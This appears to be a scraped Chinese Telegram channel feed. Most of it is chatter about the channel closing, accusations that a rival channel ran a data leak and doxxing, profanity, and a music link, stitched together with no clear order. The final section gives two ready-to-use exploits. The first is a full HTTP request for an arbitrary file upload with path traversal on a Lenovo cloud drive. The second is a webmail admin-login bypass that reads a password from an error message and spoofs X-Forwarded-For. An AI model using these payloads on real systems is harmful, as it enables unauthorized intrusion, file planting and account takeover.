表弟怎么你也④了啊😦

由于迟迟不到一万人 无法解散频道 于是我降低了要求 频道达到9500人 我就解散频道（给我一个跑的机会） 累了 不想做了 群解散 号不注销 防止有人偷我id诈骗

频道科普
https://news.1rj.ru/str/xxtxxxlplg
表面上的TG信息安全共享频道，但如果你在飞机网安圈子混得久一点你会记得他原来的名字，学习通数据跑路狗

去年学习通全库被干就是他搞的，后来分赃不均把他同伙开盒大头照都挂出来了，详见该频道最初的几条消息，https://news.1rj.ru/str/xxtxxxlplg/1
非常之恶俗

表弟说国家未来的网络安全接力棒就靠他了我是真的觉得哈人，他的效果我寻思恐怕不是网络安全，是让网络不安全🤡

我操你妈，我现在就要玩《黑神话：悟空》

平胸姐就是晓骑老大

领导人

她是领导人

经山海和表弟承认，年统一晓骑营和腾蛇成为新一届领导人，望周知

我已经不想做了

解散了 啥事都没有了

【【EVA】感谢你曾来过我的世界:│▌ One Last Kiss-哔哩哔哩】 https://b23.tv/dV0owXV


😭😭😭😭😭😭😭😭

联想网盘任意文件上传漏洞

POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
Host:xxxx
Cache-Control:max-age=0
Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Windows"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site:none
Sec-Fetch-Mode:navigate
Sec-Fetch-User:?1
Sec-Fetch-Dest:document
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/octet-stream
Accept-Encoding:gzip, deflate
Content-Length:8

WEBMAIL任意用户登录漏洞

/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显是下面这个
"errorMsg":"64d880ce7b737912ccb1"
使用回显的 errormsg 作为密码，用户名为 admin 即可登录
使用手机验证码登录的打不了
显示 IP 受限的话添加头 X-Forwarded-For: 127.0.0.1 即可
如果有回显但登录失败的话，使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 然后在登录就行了